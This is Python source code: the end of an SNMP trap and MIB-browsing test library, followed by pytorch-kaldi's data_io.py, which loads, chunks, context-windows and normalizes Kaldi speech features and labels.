def show_received_traps(self, system_name):
"""
Retrieve the captured SNMP Trap messages and show them in the console.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "List out the trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
sleep(5)
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}"
.format(len(op_trap), agent_ip))
for temp_list in op_trap:
ticks = temp_list[0].get("time_stamp")
contextengineid = temp_list[1].get("contextEngineId")
snmpver = temp_list[2].get("SNMPVER")
securityname = temp_list[3].get("securityName")
testcase_Utils.pNote(" --------->>Notification message"
"(Time Stamp:{})<<------- \n From: {}:\n "
"contextEngineId :{}\n SNMPVER :{}\n securityName: {}"
.format(ticks, agent_ip, contextengineid,
snmpver, securityname))
testcase_Utils.pNote("--------------")
for items in temp_list[4:]:
testcase_Utils.pNote("{} = {}".format(items[0], items[1]))
else:
testcase_Utils.pNote("No Trap Received from {}!".format(agent_ip), "error")
status = False
Utils.testcase_Utils.report_substep_status(status)
return status
def browse_mib(self, mib_filepath, mib_filename, browse='yes'):
"""
Browse the MIB File/single or multiple
:param mib_filepath: Mib file path of the git url or abs file path
:param mib_filename: MIB file name
        :param browse: Default value is 'yes', which browses only the MIBs named in the
                       mib_filename argument; if set to 'no', all MIBs in the given path are browsed.
:return: True or False
"""
status = True
wdesc = "Browse the MIB File"
Utils.testcase_Utils.pSubStep(wdesc)
oid, label, suffix, mibView, mibBuilder = ws.get_first_node_name(mib_filepath,
mib_filename)
temp_modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
while 1:
try:
modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
mibNode, = mibBuilder.importSymbols(modName, nodeDesc)
nodetype = re.search(r"([\w]+)\(", str(mibNode)).group(1)
if browse.lower() == 'yes':
if modName in mib_filename:
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % (
'$$', nodetype, modName+'::'+nodeDesc+'.0',
'.'.join(map(str, oid))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (
nodetype, modName+'::'+nodeDesc, '.'.join(map(str, oid))))
elif browse.lower() == 'no':
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % (
'$$', nodetype, modName+'::'+nodeDesc+'.0',
'.'.join(map(str, oid))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (
nodetype, modName+'::'+nodeDesc, '.'.join(map(str, oid))))
oid, label, suffix = mibView.getNextNodeName(oid)
except error.SmiError:
break
Utils.testcase_Utils.report_substep_status(status)
return status
def clear_received_traps(self, system_name):
"""
Clear the captured SNMP Trap messages stored in the repository.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "Clear trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
agent_ip = socket.gethostbyname(agent_ip)
clear_val = []
ws.data_repo.update({"snmp_trap_messages_{}".format(agent_ip): clear_val})
Utils.testcase_Utils.report_substep_status(status)
return status
|
data_io.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
import numpy as np
import sys
from utils import compute_cw_max,dict_fea_lab_arch,is_sequential_dict
import os
import configparser
import re, gzip, struct
def load_dataset(fea_scp,fea_opts,lab_folder,lab_opts,left,right, max_sequence_length, output_folder, fea_only=False):
def _input_is_wav_file(fea_scp):
with open(fea_scp, 'r') as f:
first_line = f.readline()
ark_file = first_line.split(' ')[1].split(':')[0]
with open(ark_file, 'rb') as f:
first_ark_line = f.readline()
return b'RIFF' in first_ark_line
def _input_is_feature_file(fea_scp):
return not _input_is_wav_file(fea_scp)
def _read_features_and_labels_with_kaldi(fea_scp, fea_opts, fea_only, lab_folder, lab_opts, output_folder):
fea = dict()
lab = dict()
if _input_is_feature_file(fea_scp):
kaldi_bin="copy-feats"
read_function = read_mat_ark
elif _input_is_wav_file(fea_scp):
kaldi_bin="wav-copy"
read_function = read_vec_flt_ark
fea = { k:m for k,m in read_function('ark:'+kaldi_bin+' scp:'+fea_scp+' ark:- |'+fea_opts,output_folder) }
if not fea_only:
            lab = { k:v for k,v in read_vec_int_ark('gunzip -c '+lab_folder+'/ali*.gz | '+lab_opts+' '+lab_folder+'/final.mdl ark:- ark:-|',output_folder) if k in fea} # Note that I'm copying only the alignments of the loaded fea
        fea = {k: v for k, v in fea.items() if k in lab} # This way I remove all the features without an alignment (see log file in alidir "Did not Succeded")
return fea, lab
def _chunk_features_and_labels(max_sequence_length, fea, lab, fea_only, input_is_wav):
def _append_to_concat_list(fea_chunked, lab_chunked, fea_conc, lab_conc, name):
for j in range(0, len(fea_chunked)):
fea_conc.append(fea_chunked[j])
lab_conc.append(lab_chunked[j])
if len(fea_chunked) > 1:
snt_name.append(name+'_split'+str(j))
else:
snt_name.append(k)
return fea_conc, lab_conc
def _chunk(max_sequence_length, fea, lab, fea_only):
def _chunk_by_input_and_output_chunk_config(chunk_config, fea, lab, fea_only):
                '''
                If the remaining sequence length is above the split threshold, we cut off a full chunk;
                the threshold guarantees a minimal remainder of roughly max/4.
                With max length = 500 the threshold is 500 + (500/4) = 625, so a sequence of 700 frames
                is split into one chunk of 500 and one of 200, while 625 frames stay in a single chunk.
                '''
chunk_size_fea, chunk_step_fea, chunk_size_lab, chunk_step_lab = chunk_config['chunk_size_fea'], chunk_config['chunk_step_fea'], chunk_config['chunk_size_lab'], chunk_config['chunk_step_lab']
fea_chunked = list()
lab_chunked = list()
split_threshold_fea = chunk_size_fea + (chunk_size_fea/4)
if(len(fea) > chunk_size_fea) and chunk_size_fea>0:
nr_of_chunks = (len(fea) + chunk_size_fea - 1) // chunk_size_fea
for i in range(nr_of_chunks):
chunk_start_fea = i * chunk_step_fea
if(len(fea[chunk_start_fea:]) > split_threshold_fea):
chunk_end_fea = chunk_start_fea + chunk_size_fea
fea_chunk = fea[chunk_start_fea:chunk_end_fea]
if not fea_only:
chunk_start_lab = i * chunk_step_lab
chunk_end_lab = chunk_start_lab + chunk_size_lab
lab_chunk = lab[chunk_start_lab:chunk_end_lab]
else:
lab_chunk = np.zeros((fea_chunk.shape[0],))
fea_chunked.append(fea_chunk)
lab_chunked.append(lab_chunk)
else:
fea_chunk = fea[chunk_start_fea:]
if not fea_only:
chunk_start_lab = i * chunk_step_lab
lab_chunk = lab[chunk_start_lab:]
else:
lab_chunk = np.zeros((fea_chunk.shape[0],))
lab_chunked.append(lab_chunk)
fea_chunked.append(fea_chunk)
break
else:
fea_chunked.append(fea)
if not fea_only:
lab_chunked.append(lab)
else:
lab_chunked.append(np.zeros((fea.shape[0],)))
return fea_chunked, lab_chunked
chunk_config = dict()
if type(max_sequence_length) == dict:
chunk_config['chunk_size_fea'] = max_sequence_length['chunk_size_fea']
chunk_config['chunk_step_fea'] = max_sequence_length['chunk_step_fea']
chunk_config['chunk_size_lab'] = max_sequence_length['chunk_size_lab']
chunk_config['chunk_step_lab'] = max_sequence_length['chunk_step_lab']
elif type(max_sequence_length) == int:
chunk_config['chunk_size_fea'] = max_sequence_length
chunk_config['chunk_step_fea'] = max_sequence_length
chunk_config['chunk_size_lab'] = max_sequence_length
chunk_config['chunk_step_lab'] = max_sequence_length
else:
raise ValueError('Unknown type of max_sequence_length')
return _chunk_by_input_and_output_chunk_config(chunk_config, fea, lab, fea_only)
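        # Worked example of the chunking above (a sketch): with chunk_size_fea = chunk_step_fea = 500
        # the split threshold is 625, so a 1300-frame utterance yields chunks of 500, 500 and 300
        # frames, while a 625-frame utterance stays in a single chunk (only remainders longer than
        # the threshold are cut).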
snt_name = list()
fea_conc = list()
lab_conc = list()
        feature_keys_sorted_by_sequence_length = sorted(sorted(fea.keys()), key=lambda k: len(fea[k]))
        for k in feature_keys_sorted_by_sequence_length:
fea_el = fea[k]
lab_el = None
if not fea_only:
lab_el = lab[k]
fea_chunked, lab_chunked = _chunk(max_sequence_length, fea_el, lab_el, fea_only)
fea_conc, lab_conc = _append_to_concat_list(fea_chunked, lab_chunked, fea_conc, lab_conc, k)
return fea_conc, lab_conc, snt_name
def _concatenate_features_and_labels(fea_conc, lab_conc):
def _sort_chunks_by_length(fea_conc, lab_conc):
fea_zipped = zip(fea_conc,lab_conc)
fea_sorted = sorted(fea_zipped, key=lambda x: x[0].shape[0])
fea_conc,lab_conc = zip(*fea_sorted)
return fea_conc, lab_conc
def _get_end_index_from_list(conc):
end_snt=0
end_index=list()
for entry in conc:
end_snt=end_snt+entry.shape[0]
end_index.append(end_snt)
return end_index
fea_conc, lab_conc = _sort_chunks_by_length(fea_conc, lab_conc)
end_index_fea = _get_end_index_from_list(fea_conc)
end_index_lab = _get_end_index_from_list(lab_conc)
fea_conc=np.concatenate(fea_conc)
lab_conc=np.concatenate(lab_conc)
return fea_conc, lab_conc, end_index_fea, end_index_lab
def _match_feature_and_label_sequence_lengths(fea, lab, max_sequence_length):
ALLOW_FRAME_DIFF_LARGER_ONE = False
def _adjust_feature_sequence_length(fea, nr_of_fea_for_lab):
nr_of_fea = fea.shape[0]
if nr_of_fea > nr_of_fea_for_lab:
fea_adj = np.take(fea, range(nr_of_fea_for_lab), axis=0)
elif nr_of_fea < nr_of_fea_for_lab:
padding = np.zeros(shape=(nr_of_fea_for_lab-nr_of_fea,) + fea.shape[1:])
fea_adj = np.concatenate([fea, padding], axis=0)
else:
fea_adj = fea
return fea_adj
chunk_size_fea = max_sequence_length['chunk_size_fea']
chunk_step_fea = max_sequence_length['chunk_step_fea']
chunk_size_lab = max_sequence_length['chunk_size_lab']
chunk_step_lab = max_sequence_length['chunk_step_lab']
window_shift = max_sequence_length['window_shift']
window_size = max_sequence_length['window_size']
for k in fea.keys():
nr_of_fea = fea[k].shape[0]
nr_of_lab = lab[k].shape[0]
nr_of_fea_for_lab = (nr_of_lab - 1) * window_shift + window_size
if abs(nr_of_fea - nr_of_fea_for_lab) > window_shift and not ALLOW_FRAME_DIFF_LARGER_ONE:
raise ValueError('Nr. of features: ' + str(nr_of_fea) + ' does not match nr. of labels: ' + str(nr_of_lab) + ' with expected nr. of features: ' + str(nr_of_fea_for_lab))
fea[k] = _adjust_feature_sequence_length(fea[k], nr_of_fea_for_lab)
return fea, lab
fea, lab = _read_features_and_labels_with_kaldi(fea_scp, fea_opts, fea_only, lab_folder, lab_opts, output_folder)
if _input_is_wav_file(fea_scp) and (not fea_only):
fea, lab = _match_feature_and_label_sequence_lengths(fea, lab, max_sequence_length)
fea_chunks, lab_chunks, chunk_names = _chunk_features_and_labels(max_sequence_length, fea, lab, fea_only, _input_is_wav_file(fea_scp))
fea_conc, lab_conc, end_index_fea, end_index_lab = _concatenate_features_and_labels(fea_chunks, lab_chunks)
return [chunk_names,fea_conc,lab_conc,np.asarray(end_index_fea),np.asarray(end_index_lab)]
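# Frame-level context windowing: two implementations follow. context_window_old
# is a straightforward per-frame loop, while context_window below builds the
# same (left + right + 1)-frame splice with vectorized np.roll calls and is the
# variant used by the chunk-loading functions in this file.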
def context_window_old(fea,left,right):
N_row=fea.shape[0]
N_fea=fea.shape[1]
frames = np.empty((N_row-left-right, N_fea*(left+right+1)))
for frame_index in range(left,N_row-right):
right_context=fea[frame_index+1:frame_index+right+1].flatten() # right context
left_context=fea[frame_index-left:frame_index].flatten() # left context
current_frame=np.concatenate([left_context,fea[frame_index],right_context])
frames[frame_index-left]=current_frame
return frames
def context_window(fea,left,right):
N_elem=fea.shape[0]
N_fea=fea.shape[1]
fea_conc=np.empty([N_elem,N_fea*(left+right+1)])
index_fea=0
for lag in range(-left,right+1):
fea_conc[:,index_fea:index_fea+fea.shape[1]]=np.roll(fea,lag,axis=0)
index_fea=index_fea+fea.shape[1]
fea_conc=fea_conc[left:fea_conc.shape[0]-right]
return fea_conc
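# A minimal usage sketch for context_window (toy shapes, not tied to any recipe
# above): with left=3 and right=3 an (N, D) feature matrix becomes an
# (N - left - right, D * (left + right + 1)) matrix of spliced frames.
#
#   fea = np.random.randn(100, 13).astype('float32')   # 100 frames, 13 dims
#   fea_cw = context_window(fea, 3, 3)
#   assert fea_cw.shape == (94, 91)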
def load_chunk(fea_scp,fea_opts,lab_folder,lab_opts,left,right,max_sequence_length, output_folder,fea_only=False):
# open the file
[data_name,data_set,data_lab,end_index_fea,end_index_lab]=load_dataset(fea_scp,fea_opts,lab_folder,lab_opts,left,right, max_sequence_length, output_folder, fea_only)
# TODO: currently end_index_lab is ignored
# Context window
if left!=0 or right!=0:
data_set=context_window(data_set,left,right)
end_index_fea=end_index_fea-left
end_index_fea[-1]=end_index_fea[-1]-right
# mean and variance normalization
data_set=(data_set-np.mean(data_set,axis=0))/np.std(data_set,axis=0)
# Label processing
data_lab=data_lab-data_lab.min()
if right>0:
data_lab=data_lab[left:-right]
else:
data_lab=data_lab[left:]
data_set=np.column_stack((data_set, data_lab))
return [data_name,data_set,end_index_fea]
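# load_chunk returns [sentence_names, data_matrix, end_indices]: data_matrix
# holds the mean/variance-normalized, context-windowed features with the label
# column stacked last, and end_indices marks where each sentence ends inside
# the concatenated matrix.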
def load_counts(class_counts_file):
with open(class_counts_file) as f:
row = next(f).strip().strip('[]').strip()
counts = np.array([ np.float32(v) for v in row.split() ])
return counts
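# load_counts expects a Kaldi-style count vector written on a single line,
# e.g. a file containing (values are purely illustrative):
#   [ 103.0 58.0 41.0 7.0 ]
# The surrounding brackets are stripped and the whitespace-separated values are
# returned as a float32 numpy array.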
def read_lab_fea_refac01(cfg_file, fea_only, shared_list, output_folder):
def _read_chunk_specific_config(cfg_file):
if not(os.path.exists(cfg_file)):
sys.stderr.write('ERROR: The config file %s does not exist!\n'%(cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
return config
def _read_from_config(config, fea_only):
def _get_max_seq_length_from_config_str(config_str):
max_seq_length=[int(e) for e in config_str.split(',')]
if len(max_seq_length) == 1:
max_seq_length = max_seq_length[0]
else:
assert len(max_seq_length) == 6
max_seq_length_list = max_seq_length
max_seq_length = dict()
max_seq_length['chunk_size_fea'] = max_seq_length_list[0]
max_seq_length['chunk_step_fea'] = max_seq_length_list[1]
max_seq_length['chunk_size_lab'] = max_seq_length_list[2]
max_seq_length['chunk_step_lab'] = max_seq_length_list[3]
max_seq_length['window_shift'] = max_seq_length_list[4]
max_seq_length['window_size'] = max_seq_length_list[5]
return max_seq_length
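        # The comma-separated string therefore carries either a single value
        # (reused for all four chunk parameters) or six values in the order:
        # chunk_size_fea, chunk_step_fea, chunk_size_lab, chunk_step_lab,
        # window_shift, window_size.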
to_do=config['exp']['to_do']
if to_do=='train':
max_seq_length=_get_max_seq_length_from_config_str(config['batches']['max_seq_length_train'])
if to_do=='valid':
max_seq_length=_get_max_seq_length_from_config_str(config['batches']['max_seq_length_valid'])
if to_do=='forward':
            max_seq_length=-1 # -1 means do not break forward sentences
fea_only=True
fea_dict, lab_dict, arch_dict = dict_fea_lab_arch(config, fea_only)
seq_model = is_sequential_dict(config, arch_dict)
return to_do, max_seq_length, fea_dict, lab_dict, arch_dict, seq_model
def _read_features_and_labels(fea_dict, lab_dict, max_seq_length, fea_only, output_folder):
def _get_fea_config_from_dict(fea_dict_entr):
fea_scp = fea_dict_entr[1]
fea_opts = fea_dict_entr[2]
cw_left = int(fea_dict_entr[3])
cw_right = int(fea_dict_entr[4])
return fea_scp, fea_opts, cw_left, cw_right
def _get_lab_config_from_dict(lab_dict_entr, fea_only):
if fea_only:
lab_folder = None
lab_opts = None
else:
lab_folder = lab_dict_entr[1]
lab_opts = lab_dict_entr[2]
return lab_folder, lab_opts
def _compensate_for_different_context_windows(data_set_fea, data_set_lab, cw_left_max, cw_left, cw_right_max, cw_right, data_end_index_fea, data_end_index_lab):
data_set_lab = np.take(data_set_lab, range(cw_left_max-cw_left,data_set_lab.shape[0]-(cw_right_max-cw_right)), axis=0, mode='clip')
data_set_fea = np.take(data_set_fea, range(cw_left_max-cw_left,data_set_fea.shape[0]-(cw_right_max-cw_right)), axis=0, mode='clip')
data_end_index_fea = data_end_index_fea - (cw_left_max - cw_left)
data_end_index_lab = data_end_index_lab - (cw_left_max - cw_left)
data_end_index_fea[-1] = data_end_index_fea[-1] - (cw_right_max - cw_right)
data_end_index_lab[-1] = data_end_index_lab[-1] - (cw_right_max - cw_right)
return data_set_lab, data_set_fea, data_end_index_fea, data_end_index_lab
def _update_data(data_set, labs, fea_dict, fea, fea_index, data_set_fea, labs_fea, cnt_fea, cnt_lab):
if cnt_fea==0 and cnt_lab==0:
data_set=data_set_fea
labs=labs_fea
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
elif cnt_fea==0 and (not cnt_lab==0):
labs=np.column_stack((labs,labs_fea))
elif (not cnt_fea==0) and cnt_lab==0:
data_set=np.column_stack((data_set,data_set_fea))
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
return data_set, labs, fea_dict, fea_index
def _check_consistency(data_name, data_name_fea, data_end_index_fea_ini, data_end_index_fea, data_end_index_lab_ini, data_end_index_lab):
if not (data_name == data_name_fea):
                sys.stderr.write('ERROR: different sentence ids are detected for the different features. Please check the input feature lists again.\n')
sys.exit(0)
if not (data_end_index_fea_ini == data_end_index_fea).all():
                sys.stderr.write('ERROR: end_index must be the same for all the sentences.\n')
sys.exit(0)
if not (data_end_index_lab_ini == data_end_index_lab).all():
                sys.stderr.write('ERROR: end_index must be the same for all the sentences.\n')
sys.exit(0)
def _update_lab_dict(lab_dict, data_set):
cnt_lab=0
for lab in lab_dict.keys():
lab_dict[lab].append(data_set.shape[1]+cnt_lab)
cnt_lab=cnt_lab+1
return lab_dict
def _load_chunk_refac01(fea_scp,fea_opts,lab_folder,lab_opts,left,right,max_sequence_length, output_folder,fea_only=False):
[data_name,data_set,data_lab,end_index_fea,end_index_lab]=load_dataset(fea_scp,fea_opts,lab_folder,lab_opts,left,right, max_sequence_length, output_folder, fea_only)
# TODO: this function will currently only work well if no context window is given or fea and lab have the same time dimensionality
# Context window
if left!=0 or right!=0:
data_set=context_window(data_set,left,right)
end_index_fea = end_index_fea - left
end_index_lab = end_index_lab - left
end_index_fea[-1] = end_index_fea[-1] - right
end_index_lab[-1] = end_index_lab[-1] - right
# mean and variance normalization
data_set=(data_set-np.mean(data_set,axis=0))/np.std(data_set,axis=0)
# Label processing
data_lab=data_lab-data_lab.min()
if right>0:
data_lab=data_lab[left:-right]
else:
data_lab=data_lab[left:]
if len(data_set.shape) == 1:
data_set = np.expand_dims(data_set, -1)
return [data_name, data_set, data_lab, end_index_fea, end_index_lab]
cw_left_max, cw_right_max = compute_cw_max(fea_dict)
fea_index=0
cnt_fea=0
data_name = None
data_end_index_fea_ini = None
data_end_index_lab_ini = None
data_set = None
labs = None
for fea in fea_dict.keys():
fea_scp, fea_opts, cw_left, cw_right = _get_fea_config_from_dict(fea_dict[fea])
cnt_lab=0
if fea_only:
lab_dict.update({'lab_name':'none'})
for lab in lab_dict.keys():
lab_folder, lab_opts = _get_lab_config_from_dict(lab_dict[lab], fea_only)
data_name_fea, data_set_fea, data_set_lab, data_end_index_fea, data_end_index_lab = _load_chunk_refac01(fea_scp, fea_opts, lab_folder, lab_opts, cw_left, cw_right, max_seq_length, output_folder, fea_only)
if sum([abs(e) for e in [cw_left_max, cw_right_max, cw_left, cw_right]]) != 0:
data_set_lab, data_set_fea, data_end_index_fea, data_end_index_lab = _compensate_for_different_context_windows(data_set_fea, data_set_lab, cw_left_max, cw_left, cw_right_max, cw_right, data_end_index_fea, data_end_index_lab)
if cnt_fea == 0 and cnt_lab == 0:
data_end_index_fea_ini = data_end_index_fea
data_end_index_lab_ini = data_end_index_lab
data_name = data_name_fea
data_set, labs, fea_dict, fea_index = _update_data(data_set, labs, fea_dict, fea, fea_index, data_set_fea, data_set_lab, cnt_fea, cnt_lab)
_check_consistency(data_name, data_name_fea, data_end_index_fea_ini, data_end_index_fea, data_end_index_lab_ini, data_end_index_lab)
cnt_lab=cnt_lab+1
cnt_fea=cnt_fea+1
if not fea_only:
lab_dict = _update_lab_dict(lab_dict, data_set)
return data_name, data_end_index_fea_ini, data_end_index_lab_ini, fea_dict, lab_dict, data_set, labs
def _reorder_data_set(data_set, labs, seq_model, to_do):
if not(seq_model) and to_do != 'forward' and (data_set.shape[0] == labs.shape[0]):
data_set_shape = data_set.shape[1]
data_set_joint = np.column_stack((data_set,labs))
            np.random.shuffle(data_set_joint)  # shuffle features and labels jointly so they stay aligned
data_set = data_set_joint[:, :data_set_shape]
labs = np.squeeze(data_set_joint[:, data_set_shape:], axis=-1)
return data_set, labs
def _append_to_shared_list(shared_list, data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set):
shared_list.append(data_name)
shared_list.append(data_end_index_fea)
shared_list.append(data_end_index_lab)
shared_list.append(fea_dict)
shared_list.append(lab_dict)
shared_list.append(arch_dict)
shared_list.append(data_set)
return shared_list
config = _read_chunk_specific_config(cfg_file)
to_do, max_seq_length, fea_dict, lab_dict, arch_dict, seq_model = _read_from_config(config, fea_only)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, data_set, labs = _read_features_and_labels(fea_dict, lab_dict, max_seq_length, fea_only, output_folder)
data_set, labs = _reorder_data_set(data_set, labs, seq_model, to_do)
data_set = {'input': data_set, 'ref': labs}
shared_list = _append_to_shared_list(shared_list, data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set)
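# read_lab_fea_refac01 fills shared_list with, in order: sentence names,
# feature end indices, label end indices, fea_dict, lab_dict, arch_dict, and a
# {'input': features, 'ref': labels} dictionary.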
def read_lab_fea(cfg_file,fea_only,shared_list,output_folder):
# Reading chunk-specific cfg file (first argument-mandatory file)
if not(os.path.exists(cfg_file)):
sys.stderr.write('ERROR: The config file %s does not exist!\n'%(cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Reading some cfg parameters
to_do=config['exp']['to_do']
if to_do=='train':
max_seq_length=int(config['batches']['max_seq_length_train']) #*(int(info_file[-13:-10])+1) # increasing over the epochs
if to_do=='valid':
max_seq_length=int(config['batches']['max_seq_length_valid'])
if to_do=='forward':
        max_seq_length=-1 # -1 means do not break forward sentences
[fea_dict,lab_dict,arch_dict]=dict_fea_lab_arch(config,fea_only)
[cw_left_max,cw_right_max]=compute_cw_max(fea_dict)
fea_index=0
cnt_fea=0
for fea in fea_dict.keys():
# reading the features
fea_scp=fea_dict[fea][1]
fea_opts=fea_dict[fea][2]
cw_left=int(fea_dict[fea][3])
cw_right=int(fea_dict[fea][4])
cnt_lab=0
# Production case, we don't have labels (lab_name = none)
if fea_only:
lab_dict.update({'lab_name':'none'})
for lab in lab_dict.keys():
# Production case, we don't have labels (lab_name = none)
if fea_only:
lab_folder=None
lab_opts=None
else:
lab_folder=lab_dict[lab][1]
lab_opts=lab_dict[lab][2]
[data_name_fea,data_set_fea,data_end_index_fea]=load_chunk(fea_scp,fea_opts,lab_folder,lab_opts,cw_left,cw_right,max_seq_length, output_folder, fea_only)
            # making the dimensions the same for all the features (compensating for different context windows)
labs_fea=data_set_fea[cw_left_max-cw_left:data_set_fea.shape[0]-(cw_right_max-cw_right),-1]
data_set_fea=data_set_fea[cw_left_max-cw_left:data_set_fea.shape[0]-(cw_right_max-cw_right),0:-1]
data_end_index_fea=data_end_index_fea-(cw_left_max-cw_left)
data_end_index_fea[-1]=data_end_index_fea[-1]-(cw_right_max-cw_right)
if cnt_fea==0 and cnt_lab==0:
data_set=data_set_fea
labs=labs_fea
                data_end_index=data_end_index_fea
data_name=data_name_fea
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
else:
if cnt_fea==0:
labs=np.column_stack((labs,labs_fea))
if cnt_lab==0:
data_set=np.column_stack((data_set,data_set_fea))
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
# Checks if lab_names are the same for all the features
if not(data_name==data_name_fea):
                sys.stderr.write('ERROR: different sentence ids are detected for the different features. Please check the input feature lists again.\n')
sys.exit(0)
# Checks if end indexes are the same for all the features
if not(data_end_index==data_end_index_fea).all():
                sys.stderr.write('ERROR: end_index must be the same for all the sentences.\n')
sys.exit(0)
cnt_lab=cnt_lab+1
cnt_fea=cnt_fea+1
cnt_lab=0
if not fea_only:
for lab in lab_dict.keys():
lab_dict[lab].append(data_set.shape[1]+cnt_lab)
cnt_lab=cnt_lab+1
data_set=np.column_stack((data_set,labs))
# check automatically if the model is sequential
seq_model=is_sequential_dict(config,arch_dict)
# Randomize if the model is not sequential
if not(seq_model) and to_do!='forward':
np.random.shuffle(data_set)
    # Split the dataset into multiple parts. If the dataset is too big, copying it into shared memory can fail (due to pickle limits)
#N_split=10
#data_set=np.array_split(data_set, N_split)
# Adding all the elements in the shared list
shared_list.append(data_name)
shared_list.append(data_end_index)
shared_list.append(fea_dict)
shared_list.append(lab_dict)
shared_list.append(arch_dict)
shared_list.append(data_set)
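# The legacy read_lab_fea instead appends six items to shared_list: sentence
# names, one set of end indices, fea_dict, lab_dict, arch_dict, and a single
# data matrix with the label column(s) stacked after the features.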
# The following libraries are copied from kaldi-io-for-python project (https://github.com/vesis84/kaldi-io-for-python)
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, output_folder,mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
   Seeks to the given offset if the 'file' argument contains a ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], output_folder,'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], output_folder,'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
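# Accepted 'file' forms mirror Kaldi rxfilenames (the commands and paths below
# are illustrative only): a plain path ('feats.ark'), a path with a byte offset
# ('feats.ark:1024'), a gzipped file ('ali.gz'), an input pipe ending in '|'
# (e.g. 'copy-feats scp:feats.scp ark:- |'), an output pipe starting with '|',
# or an already opened file descriptor.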
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, output_folder,mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
  assert(re.match(r'^\S+$', key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd,output_folder):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd,output_folder)
def read_vec_int_ark(file_or_fd,output_folder):
